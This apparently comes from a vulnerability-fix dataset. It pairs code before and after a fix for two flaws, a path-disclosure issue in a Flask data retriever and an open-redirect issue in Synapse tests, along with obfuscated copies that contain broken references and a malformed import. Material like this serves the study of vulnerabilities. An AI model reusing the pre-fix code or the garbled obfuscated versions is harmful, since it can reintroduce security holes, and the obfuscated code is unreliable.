keyword = positive_firstline.split('/')[-2] # Assuming all positives are in the same parent dir
_log.info("Dir {} BR: {} Seed:{} FP{}".format(base_dir, base_rate, seed, filepath))
sys.stdout.flush()
if not os.path.exists(filepath):
positive_data = read_file_list(positive_path) # same across servers
negative_data = read_file_list(negative_path) # different across servers
random.Random(seed).shuffle(positive_data)
random.Random(seed).shuffle(negative_data)
len_positive = len(positive_data)
start_idx = int(rank * (1.0 / total_servers) * len_positive)
end_idx = int((rank+1) * (1.0 / total_servers) * len_positive)
positive_data = positive_data[start_idx:end_idx]
len_positive = len(positive_data)
negative_sample = int(len_positive * (100./base_rate -1))
negative_data = negative_data[:negative_sample]
return write_data(filepath, [negative_data, positive_data], seed), keyword
return read_file_list(filepath), keyword
| path_disclosure | {
"code": [
"from werkzeug.utils import safe_join"
],
"line_no": [
27
]
} | {
"code": [
"from werkzeug.security import safe_join"
],
"line_no": [
27
]
} |
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.utils import safe_join
from opendiamond.dataretriever.util import read_file_list, write_data
VAR_0 = 'augment'
VAR_1 = False
VAR_2 = True # if true, return local file VAR_31, otherwise http.
VAR_3 = VAR_4 = None
VAR_5 = int(1e4)
VAR_6 = 'yellowthroat'
"""
Example url:
/augment/root/<ROOT_DIR>/distributed/<id>of<N>/ \
VAR_29/<d/r ([d]eterminant/[r]andom)>_<random_seed>_<VAR_20>
/augment/root/STREAM/distributed/1of2/VAR_29/d_42_1.0
"""
def FUNC_0(VAR_7):
global VAR_3, VAR_4 # pylint: disable=global-statement
VAR_3 = 'STREAM'
VAR_4 = VAR_7.dataroot
VAR_8 = Blueprint('augment_store', __name__)
VAR_9 = logging.getLogger(__name__)
@VAR_8.route('/root/<VAR_10>/distributed/<int:VAR_11>of<int:VAR_12>' +
'/VAR_29/<VAR_13>')
@VAR_8.route('/root/<VAR_10>/VAR_29/<VAR_13>')
@VAR_8.route('/root/<VAR_10>/distributed/<int:VAR_11>of<int:VAR_12>' +
'/VAR_29/<VAR_13>/VAR_14/<int:VAR_14>/VAR_15/<int:VAR_15>')
@VAR_8.route('/root/<VAR_10>/VAR_29/<VAR_13>' +
'/VAR_14/<int:VAR_14>/VAR_15/<int:VAR_15>')
def FUNC_1(VAR_10, VAR_11=0, VAR_12=1, VAR_13=None, VAR_14=0, VAR_15=sys.maxsize):
global VAR_6
if VAR_10 == "0":
VAR_10 = VAR_3
VAR_10 = FUNC_7(VAR_10)
VAR_21 = None
VAR_24 = 0.
VAR_21, VAR_24 = FUNC_2(VAR_13)
VAR_25, VAR_6 = FUNC_9(VAR_10, VAR_24, VAR_21, VAR_11, VAR_12)
VAR_26 = len(VAR_25)
VAR_14 = start if VAR_14 > 0 else 0
VAR_27 = min(VAR_26, VAR_14 + VAR_15) if VAR_15 > 0 else VAR_26
VAR_25 = base_list[VAR_14:VAR_27]
VAR_26 = VAR_27 - VAR_14
def FUNC_10():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if VAR_1:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(VAR_26)
for VAR_31 in VAR_25:
VAR_31 = path.strip()
yield FUNC_4(VAR_16=VAR_31) + '\n'
yield '</objectlist>\n'
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(FUNC_10()),
status="200 OK",
VAR_28=headers)
def FUNC_2(VAR_13):
VAR_29 = VAR_13.split('_')
VAR_30 = VAR_29[0]
VAR_21 = None
if len(VAR_29) > 1:
VAR_21 = int(VAR_29[1])
if VAR_30 == 'r' or VAR_21 is None:
VAR_21 = random.randrange(10000)
VAR_24 = 0.1 # default VAR_20 = 0.1%
if len(VAR_29) > 2:
VAR_24 = float(VAR_29[2])
return VAR_21, round(VAR_24, 4)
@VAR_8.route('/id/<VAR_31:VAR_16>')
def FUNC_3(VAR_16):
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(FUNC_4(VAR_16=object_path),
"200 OK",
VAR_28=headers)
def FUNC_4(VAR_16):
VAR_31 = FUNC_7(VAR_16)
VAR_32 = {'_gt_label': VAR_6}
if VAR_6 in VAR_31:
return '<object id={} src={} VAR_32={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_16=object_path)),
quoteattr(FUNC_6(VAR_16)),
quoteattr(url_for('.get_object_meta', VAR_17=True)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_16=object_path)),
quoteattr(FUNC_6(VAR_16)))
@VAR_8.route('/VAR_32/<VAR_31:VAR_17>')
def FUNC_5(VAR_17=False):
VAR_33 = dict()
if VAR_17:
VAR_33['_gt_label'] = VAR_6
return jsonify(VAR_33)
def FUNC_6(VAR_16):
if VAR_2:
return 'file://' + FUNC_7(VAR_16)
return url_for('.get_object_src_http', VAR_18=VAR_16)
def FUNC_7(VAR_18):
return safe_join(VAR_4, VAR_18)
@VAR_8.route('/obj/<VAR_31:VAR_18>')
def FUNC_8(VAR_18):
VAR_31 = FUNC_7(VAR_18)
VAR_28 = Headers()
VAR_34 = send_file(VAR_31,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
VAR_34.headers.extend(VAR_28)
return VAR_34
def FUNC_9(VAR_19, VAR_20=0.05, VAR_21=42, VAR_22=0, VAR_23=1):
VAR_35 = ['STREAM', "{:.2f}".format(VAR_20), str(VAR_22), str(VAR_23), str(VAR_21)]
VAR_36 = '_'.join(VAR_35)
VAR_36 = os.path.join(VAR_19, VAR_36)
VAR_37 = os.path.join(VAR_19, 'POSITIVE')
VAR_38 = os.path.join(VAR_19, 'NEGATIVE')
VAR_39 = open(VAR_37).readline().rstrip()
VAR_40 = VAR_39.split('/')[-2] # Assuming all positives are in the same parent dir
VAR_9.info("Dir {} BR: {} Seed:{} FP{}".format(VAR_19, VAR_20, VAR_21, VAR_36))
sys.stdout.flush()
if not os.path.exists(VAR_36):
VAR_41 = read_file_list(VAR_37) # same across servers
VAR_42 = read_file_list(VAR_38) # different across servers
random.Random(VAR_21).shuffle(VAR_41)
random.Random(VAR_21).shuffle(VAR_42)
VAR_43 = len(VAR_41)
VAR_44 = int(VAR_22 * (1.0 / VAR_23) * VAR_43)
VAR_45 = int((VAR_22+1) * (1.0 / VAR_23) * VAR_43)
VAR_41 = positive_data[VAR_44:VAR_45]
VAR_43 = len(VAR_41)
VAR_46 = int(VAR_43 * (100./VAR_20 -1))
VAR_42 = negative_data[:VAR_46]
return write_data(VAR_36, [VAR_42, VAR_41], VAR_21), VAR_40
return read_file_list(VAR_36), VAR_40
|
from builtins import next
from builtins import range
import os
import datetime
from xml.sax.saxutils import quoteattr
import sys
import logging
import random
import glob
from itertools import cycle
from flask import Blueprint, url_for, Response, stream_with_context, send_file, \
jsonify
from werkzeug.datastructures import Headers
from werkzeug.security import safe_join
from opendiamond.dataretriever.util import read_file_list, write_data
VAR_0 = 'augment'
VAR_1 = False
VAR_2 = True # if true, return local file VAR_31, otherwise http.
VAR_3 = VAR_4 = None
VAR_5 = int(1e4)
VAR_6 = 'yellowthroat'
"""
Example url:
/augment/root/<ROOT_DIR>/distributed/<id>of<N>/ \
VAR_29/<d/r ([d]eterminant/[r]andom)>_<random_seed>_<VAR_20>
/augment/root/STREAM/distributed/1of2/VAR_29/d_42_1.0
"""
def FUNC_0(VAR_7):
global VAR_3, VAR_4 # pylint: disable=global-statement
VAR_3 = 'STREAM'
VAR_4 = VAR_7.dataroot
VAR_8 = Blueprint('augment_store', __name__)
VAR_9 = logging.getLogger(__name__)
@VAR_8.route('/root/<VAR_10>/distributed/<int:VAR_11>of<int:VAR_12>' +
'/VAR_29/<VAR_13>')
@VAR_8.route('/root/<VAR_10>/VAR_29/<VAR_13>')
@VAR_8.route('/root/<VAR_10>/distributed/<int:VAR_11>of<int:VAR_12>' +
'/VAR_29/<VAR_13>/VAR_14/<int:VAR_14>/VAR_15/<int:VAR_15>')
@VAR_8.route('/root/<VAR_10>/VAR_29/<VAR_13>' +
'/VAR_14/<int:VAR_14>/VAR_15/<int:VAR_15>')
def FUNC_1(VAR_10, VAR_11=0, VAR_12=1, VAR_13=None, VAR_14=0, VAR_15=sys.maxsize):
global VAR_6
if VAR_10 == "0":
VAR_10 = VAR_3
VAR_10 = FUNC_7(VAR_10)
VAR_21 = None
VAR_24 = 0.
VAR_21, VAR_24 = FUNC_2(VAR_13)
VAR_25, VAR_6 = FUNC_9(VAR_10, VAR_24, VAR_21, VAR_11, VAR_12)
VAR_26 = len(VAR_25)
VAR_14 = start if VAR_14 > 0 else 0
VAR_27 = min(VAR_26, VAR_14 + VAR_15) if VAR_15 > 0 else VAR_26
VAR_25 = base_list[VAR_14:VAR_27]
VAR_26 = VAR_27 - VAR_14
def FUNC_10():
yield '<?xml version="1.0" encoding="UTF-8" ?>\n'
if VAR_1:
yield '<?xml-stylesheet type="text/xsl" href="/scopelist.xsl" ?>\n'
yield '<objectlist count="{:d}">\n'.format(VAR_26)
for VAR_31 in VAR_25:
VAR_31 = path.strip()
yield FUNC_4(VAR_16=VAR_31) + '\n'
yield '</objectlist>\n'
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(stream_with_context(FUNC_10()),
status="200 OK",
VAR_28=headers)
def FUNC_2(VAR_13):
VAR_29 = VAR_13.split('_')
VAR_30 = VAR_29[0]
VAR_21 = None
if len(VAR_29) > 1:
VAR_21 = int(VAR_29[1])
if VAR_30 == 'r' or VAR_21 is None:
VAR_21 = random.randrange(10000)
VAR_24 = 0.1 # default VAR_20 = 0.1%
if len(VAR_29) > 2:
VAR_24 = float(VAR_29[2])
return VAR_21, round(VAR_24, 4)
@VAR_8.route('/id/<VAR_31:VAR_16>')
def FUNC_3(VAR_16):
VAR_28 = Headers([('Content-Type', 'text/xml')])
return Response(FUNC_4(VAR_16=object_path),
"200 OK",
VAR_28=headers)
def FUNC_4(VAR_16):
VAR_31 = FUNC_7(VAR_16)
VAR_32 = {'_gt_label': VAR_6}
if VAR_6 in VAR_31:
return '<object id={} src={} VAR_32={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_16=object_path)),
quoteattr(FUNC_6(VAR_16)),
quoteattr(url_for('.get_object_meta', VAR_17=True)))
return '<object id={} src={} />' \
.format(quoteattr(url_for('.get_object_id', VAR_16=object_path)),
quoteattr(FUNC_6(VAR_16)))
@VAR_8.route('/VAR_32/<VAR_31:VAR_17>')
def FUNC_5(VAR_17=False):
VAR_33 = dict()
if VAR_17:
VAR_33['_gt_label'] = VAR_6
return jsonify(VAR_33)
def FUNC_6(VAR_16):
if VAR_2:
return 'file://' + FUNC_7(VAR_16)
return url_for('.get_object_src_http', VAR_18=VAR_16)
def FUNC_7(VAR_18):
return safe_join(VAR_4, VAR_18)
@VAR_8.route('/obj/<VAR_31:VAR_18>')
def FUNC_8(VAR_18):
VAR_31 = FUNC_7(VAR_18)
VAR_28 = Headers()
VAR_34 = send_file(VAR_31,
cache_timeout=datetime.timedelta(
days=365).total_seconds(),
add_etags=True,
conditional=True)
VAR_34.headers.extend(VAR_28)
return VAR_34
def FUNC_9(VAR_19, VAR_20=0.05, VAR_21=42, VAR_22=0, VAR_23=1):
VAR_35 = ['STREAM', "{:.2f}".format(VAR_20), str(VAR_22), str(VAR_23), str(VAR_21)]
VAR_36 = '_'.join(VAR_35)
VAR_36 = os.path.join(VAR_19, VAR_36)
VAR_37 = os.path.join(VAR_19, 'POSITIVE')
VAR_38 = os.path.join(VAR_19, 'NEGATIVE')
VAR_39 = open(VAR_37).readline().rstrip()
VAR_40 = VAR_39.split('/')[-2] # Assuming all positives are in the same parent dir
VAR_9.info("Dir {} BR: {} Seed:{} FP{}".format(VAR_19, VAR_20, VAR_21, VAR_36))
sys.stdout.flush()
if not os.path.exists(VAR_36):
VAR_41 = read_file_list(VAR_37) # same across servers
VAR_42 = read_file_list(VAR_38) # different across servers
random.Random(VAR_21).shuffle(VAR_41)
random.Random(VAR_21).shuffle(VAR_42)
VAR_43 = len(VAR_41)
VAR_44 = int(VAR_22 * (1.0 / VAR_23) * VAR_43)
VAR_45 = int((VAR_22+1) * (1.0 / VAR_23) * VAR_43)
VAR_41 = positive_data[VAR_44:VAR_45]
VAR_43 = len(VAR_41)
VAR_46 = int(VAR_43 * (100./VAR_20 -1))
VAR_42 = negative_data[:VAR_46]
return write_data(VAR_36, [VAR_42, VAR_41], VAR_21), VAR_40
return read_file_list(VAR_36), VAR_40
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
19,
29,
30,
37,
42,
45,
46,
51,
52,
54,
56,
68,
73,
74,
75,
78,
83,
88,
90,
94,
96,
98,
102,
119,
126,
135,
139,
140,
146,
148,
152,
154,
157,
161,
163,
164,
172,
178,
186,
189,
203,
205,
104,
105,
106,
107,
174,
175,
176,
177
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
19,
29,
30,
37,
42,
45,
46,
51,
52,
54,
56,
68,
73,
74,
75,
78,
83,
88,
90,
94,
96,
98,
102,
119,
126,
135,
139,
140,
146,
148,
152,
154,
157,
161,
163,
164,
172,
178,
186,
189,
203,
205,
104,
105,
106,
107,
174,
175,
176,
177
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest.mock import Mock
from synapse.api.constants import Membership
from synapse.rest.admin import register_servlets_for_client_rest_resource
from synapse.rest.client.v1 import login, room
from synapse.types import UserID, create_requester
from tests import unittest
from tests.test_utils import event_injection
from tests.utils import TestHomeServer
class RoomMemberStoreTestCase(unittest.HomeserverTestCase):
servlets = [
login.register_servlets,
register_servlets_for_client_rest_resource,
room.register_servlets,
]
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
resource_for_federation=Mock(), http_client=None
)
return hs
def prepare(self, reactor, clock, hs: TestHomeServer):
# We can't test the RoomMemberStore on its own without the other event
# storage logic
self.store = hs.get_datastore()
self.u_alice = self.register_user("alice", "pass")
self.t_alice = self.login("alice", "pass")
self.u_bob = self.register_user("bob", "pass")
# User elsewhere on another host
self.u_charlie = UserID.from_string("@charlie:elsewhere")
def test_one_member(self):
# Alice creates the room, and is automatically joined
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
rooms_for_user = self.get_success(
self.store.get_rooms_for_local_user_where_membership_is(
self.u_alice, [Membership.JOIN]
)
)
self.assertEquals([self.room], [m.room_id for m in rooms_for_user])
def test_count_known_servers(self):
"""
_count_known_servers will calculate how many servers are in a room.
"""
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
servers = self.get_success(self.store._count_known_servers())
self.assertEqual(servers, 2)
def test_count_known_servers_stat_counter_disabled(self):
"""
If enabled, the metrics for how many servers are known will be counted.
"""
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump()
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
@unittest.override_config(
{"enable_metrics": True, "metrics_flags": {"known_servers": True}}
)
def test_count_known_servers_stat_counter_enabled(self):
"""
If enabled, the metrics for how many servers are known will be counted.
"""
# Initialises to 1 -- itself
self.assertEqual(self.store._known_servers_count, 1)
self.pump()
# No rooms have been joined, so technically the SQL returns 0, but it
# will still say it knows about itself.
self.assertEqual(self.store._known_servers_count, 1)
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump(1)
# It now knows about Charlie's server.
self.assertEqual(self.store._known_servers_count, 2)
def test_get_joined_users_from_context(self):
room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
bob_event = self.get_success(
event_injection.inject_member_event(
self.hs, room, self.u_bob, Membership.JOIN
)
)
# first, create a regular event
event, context = self.get_success(
event_injection.create_event(
self.hs,
room_id=room,
sender=self.u_alice,
prev_event_ids=[bob_event.event_id],
type="m.test.1",
content={},
)
)
users = self.get_success(
self.store.get_joined_users_from_context(event, context)
)
self.assertEqual(users.keys(), {self.u_alice, self.u_bob})
# Regression test for #7376: create a state event whose key matches bob's
# user_id, but which is *not* a membership event, and persist that; then check
# that `get_joined_users_from_context` returns the correct users for the next event.
non_member_event = self.get_success(
event_injection.inject_event(
self.hs,
room_id=room,
sender=self.u_bob,
prev_event_ids=[bob_event.event_id],
type="m.test.2",
state_key=self.u_bob,
content={},
)
)
event, context = self.get_success(
event_injection.create_event(
self.hs,
room_id=room,
sender=self.u_alice,
prev_event_ids=[non_member_event.event_id],
type="m.test.3",
content={},
)
)
users = self.get_success(
self.store.get_joined_users_from_context(event, context)
)
self.assertEqual(users.keys(), {self.u_alice, self.u_bob})
class CurrentStateMembershipUpdateTestCase(unittest.HomeserverTestCase):
def prepare(self, reactor, clock, homeserver):
self.store = homeserver.get_datastore()
self.room_creator = homeserver.get_room_creation_handler()
def test_can_rerun_update(self):
# First make sure we have completed all updates.
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
# Now let's create a room, which will insert a membership
user = UserID("alice", "test")
requester = create_requester(user)
self.get_success(self.room_creator.create_room(requester, {}))
# Register the background update to run again.
self.get_success(
self.store.db_pool.simple_insert(
table="background_updates",
values={
"update_name": "current_state_events_membership",
"progress_json": "{}",
"depends_on": None,
},
)
)
# ... and tell the DataStore that it hasn't finished all updates yet
self.store.db_pool.updates._all_done = False
# Now let's actually drive the updates to completion
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest.mock import Mock
from synapse.api.constants import Membership
from synapse.rest.admin import register_servlets_for_client_rest_resource
from synapse.rest.client.v1 import login, room
from synapse.types import UserID, create_requester
from tests import unittest
from tests.test_utils import event_injection
from tests.utils import TestHomeServer
class RoomMemberStoreTestCase(unittest.HomeserverTestCase):
servlets = [
login.register_servlets,
register_servlets_for_client_rest_resource,
room.register_servlets,
]
def make_homeserver(self, reactor, clock):
hs = self.setup_test_homeserver(
resource_for_federation=Mock(), federation_http_client=None
)
return hs
def prepare(self, reactor, clock, hs: TestHomeServer):
# We can't test the RoomMemberStore on its own without the other event
# storage logic
self.store = hs.get_datastore()
self.u_alice = self.register_user("alice", "pass")
self.t_alice = self.login("alice", "pass")
self.u_bob = self.register_user("bob", "pass")
# User elsewhere on another host
self.u_charlie = UserID.from_string("@charlie:elsewhere")
def test_one_member(self):
# Alice creates the room, and is automatically joined
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
rooms_for_user = self.get_success(
self.store.get_rooms_for_local_user_where_membership_is(
self.u_alice, [Membership.JOIN]
)
)
self.assertEquals([self.room], [m.room_id for m in rooms_for_user])
def test_count_known_servers(self):
"""
_count_known_servers will calculate how many servers are in a room.
"""
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
servers = self.get_success(self.store._count_known_servers())
self.assertEqual(servers, 2)
def test_count_known_servers_stat_counter_disabled(self):
"""
If enabled, the metrics for how many servers are known will be counted.
"""
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump()
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
@unittest.override_config(
{"enable_metrics": True, "metrics_flags": {"known_servers": True}}
)
def test_count_known_servers_stat_counter_enabled(self):
"""
If enabled, the metrics for how many servers are known will be counted.
"""
# Initialises to 1 -- itself
self.assertEqual(self.store._known_servers_count, 1)
self.pump()
# No rooms have been joined, so technically the SQL returns 0, but it
# will still say it knows about itself.
self.assertEqual(self.store._known_servers_count, 1)
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump(1)
# It now knows about Charlie's server.
self.assertEqual(self.store._known_servers_count, 2)
def test_get_joined_users_from_context(self):
room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
bob_event = self.get_success(
event_injection.inject_member_event(
self.hs, room, self.u_bob, Membership.JOIN
)
)
# first, create a regular event
event, context = self.get_success(
event_injection.create_event(
self.hs,
room_id=room,
sender=self.u_alice,
prev_event_ids=[bob_event.event_id],
type="m.test.1",
content={},
)
)
users = self.get_success(
self.store.get_joined_users_from_context(event, context)
)
self.assertEqual(users.keys(), {self.u_alice, self.u_bob})
# Regression test for #7376: create a state event whose key matches bob's
# user_id, but which is *not* a membership event, and persist that; then check
# that `get_joined_users_from_context` returns the correct users for the next event.
non_member_event = self.get_success(
event_injection.inject_event(
self.hs,
room_id=room,
sender=self.u_bob,
prev_event_ids=[bob_event.event_id],
type="m.test.2",
state_key=self.u_bob,
content={},
)
)
event, context = self.get_success(
event_injection.create_event(
self.hs,
room_id=room,
sender=self.u_alice,
prev_event_ids=[non_member_event.event_id],
type="m.test.3",
content={},
)
)
users = self.get_success(
self.store.get_joined_users_from_context(event, context)
)
self.assertEqual(users.keys(), {self.u_alice, self.u_bob})
class CurrentStateMembershipUpdateTestCase(unittest.HomeserverTestCase):
def prepare(self, reactor, clock, homeserver):
self.store = homeserver.get_datastore()
self.room_creator = homeserver.get_room_creation_handler()
def test_can_rerun_update(self):
# First make sure we have completed all updates.
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
# Now let's create a room, which will insert a membership
user = UserID("alice", "test")
requester = create_requester(user)
self.get_success(self.room_creator.create_room(requester, {}))
# Register the background update to run again.
self.get_success(
self.store.db_pool.simple_insert(
table="background_updates",
values={
"update_name": "current_state_events_membership",
"progress_json": "{}",
"depends_on": None,
},
)
)
# ... and tell the DataStore that it hasn't finished all updates yet
self.store.db_pool.updates._all_done = False
# Now let's actually drive the updates to completion
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
| open_redirect | {
"code": [
" resource_for_federation=Mock(), http_client=None"
],
"line_no": [
39
]
} | {
"code": [
" resource_for_federation=Mock(), federation_http_client=None"
],
"line_no": [
39
]
} |
from unittest.mock import Mock
from synapse.api.constants import Membership
from synapse.rest.admin import register_servlets_for_client_rest_resource
from synapse.rest.client.v1 import login, VAR_7
from synapse.types import UserID, create_requester
from tests import unittest
from tests.test_utils import .event_injection
from tests.utils import TestHomeServer
class CLASS_0(unittest.HomeserverTestCase):
VAR_0 = [
login.register_servlets,
register_servlets_for_client_rest_resource,
VAR_7.register_servlets,
]
def FUNC_0(self, VAR_1, VAR_2):
VAR_3 = self.setup_test_homeserver(
resource_for_federation=Mock(), http_client=None
)
return VAR_3
def FUNC_1(self, VAR_1, VAR_2, VAR_3: TestHomeServer):
self.store = VAR_3.get_datastore()
self.u_alice = self.register_user("alice", "pass")
self.t_alice = self.login("alice", "pass")
self.u_bob = self.register_user("bob", "pass")
self.u_charlie = UserID.from_string("@charlie:elsewhere")
def FUNC_2(self):
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
VAR_5 = self.get_success(
self.store.get_rooms_for_local_user_where_membership_is(
self.u_alice, [Membership.JOIN]
)
)
self.assertEquals([self.room], [m.room_id for m in VAR_5])
def FUNC_3(self):
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
VAR_6 = self.get_success(self.store._count_known_servers())
self.assertEqual(VAR_6, 2)
def FUNC_4(self):
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump()
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
@unittest.override_config(
{"enable_metrics": True, "metrics_flags": {"known_servers": True}}
)
def FUNC_5(self):
self.assertEqual(self.store._known_servers_count, 1)
self.pump()
self.assertEqual(self.store._known_servers_count, 1)
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
self.pump(1)
self.assertEqual(self.store._known_servers_count, 2)
def FUNC_6(self):
VAR_7 = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
VAR_8 = self.get_success(
event_injection.inject_member_event(
self.hs, VAR_7, self.u_bob, Membership.JOIN
)
)
VAR_9, VAR_10 = self.get_success(
event_injection.create_event(
self.hs,
room_id=VAR_7,
sender=self.u_alice,
prev_event_ids=[VAR_8.event_id],
type="m.test.1",
content={},
)
)
VAR_11 = self.get_success(
self.store.get_joined_users_from_context(VAR_9, VAR_10)
)
self.assertEqual(VAR_11.keys(), {self.u_alice, self.u_bob})
VAR_12 = self.get_success(
event_injection.inject_event(
self.hs,
room_id=VAR_7,
sender=self.u_bob,
prev_event_ids=[VAR_8.event_id],
type="m.test.2",
state_key=self.u_bob,
content={},
)
)
VAR_9, VAR_10 = self.get_success(
event_injection.create_event(
self.hs,
room_id=VAR_7,
sender=self.u_alice,
prev_event_ids=[VAR_12.event_id],
type="m.test.3",
content={},
)
)
VAR_11 = self.get_success(
self.store.get_joined_users_from_context(VAR_9, VAR_10)
)
self.assertEqual(VAR_11.keys(), {self.u_alice, self.u_bob})
class CLASS_1(unittest.HomeserverTestCase):
def FUNC_1(self, VAR_1, VAR_2, VAR_4):
self.store = VAR_4.get_datastore()
self.room_creator = VAR_4.get_room_creation_handler()
def FUNC_7(self):
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
VAR_13 = UserID("alice", "test")
VAR_14 = create_requester(VAR_13)
self.get_success(self.room_creator.create_room(VAR_14, {}))
self.get_success(
self.store.db_pool.simple_insert(
table="background_updates",
values={
"update_name": "current_state_events_membership",
"progress_json": "{}",
"depends_on": None,
},
)
)
self.store.db_pool.updates._all_done = False
while not self.get_success(
self.store.db_pool.updates.has_completed_background_updates()
):
self.get_success(
self.store.db_pool.updates.do_next_background_update(100), by=0.1
)
|
from unittest.mock import Mock
from synapse.api.constants import Membership
from synapse.rest.admin import register_servlets_for_client_rest_resource
from synapse.rest.client.v1 import login, VAR_7
from synapse.types import UserID, create_requester
from tests import unittest
from tests.test_utils import .event_injection
from tests.utils import TestHomeServer
class CLASS_0(unittest.HomeserverTestCase):
VAR_0 = [
login.register_servlets,
register_servlets_for_client_rest_resource,
VAR_7.register_servlets,
]
def FUNC_0(self, VAR_1, VAR_2):
VAR_3 = self.setup_test_homeserver(
resource_for_federation=Mock(), federation_http_client=None
)
return VAR_3
def FUNC_1(self, VAR_1, VAR_2, VAR_3: TestHomeServer):
self.store = VAR_3.get_datastore()
self.u_alice = self.register_user("alice", "pass")
self.t_alice = self.login("alice", "pass")
self.u_bob = self.register_user("bob", "pass")
self.u_charlie = UserID.from_string("@charlie:elsewhere")
def FUNC_2(self):
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
VAR_5 = self.get_success(
self.store.get_rooms_for_local_user_where_membership_is(
self.u_alice, [Membership.JOIN]
)
)
self.assertEquals([self.room], [m.room_id for m in VAR_5])
def FUNC_3(self):
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
VAR_6 = self.get_success(self.store._count_known_servers())
self.assertEqual(VAR_6, 2)
def FUNC_4(self):
self.assertTrue("_known_servers_count" not in self.store.__dict__.keys())
self.room = self.helper.create_room_as(self.u_alice, tok=self.t_alice)
self.inject_room_member(self.room, self.u_bob, Membership.JOIN)
self.inject_room_member(self.room, self.u_charlie.to_string(), Membership.JOIN)
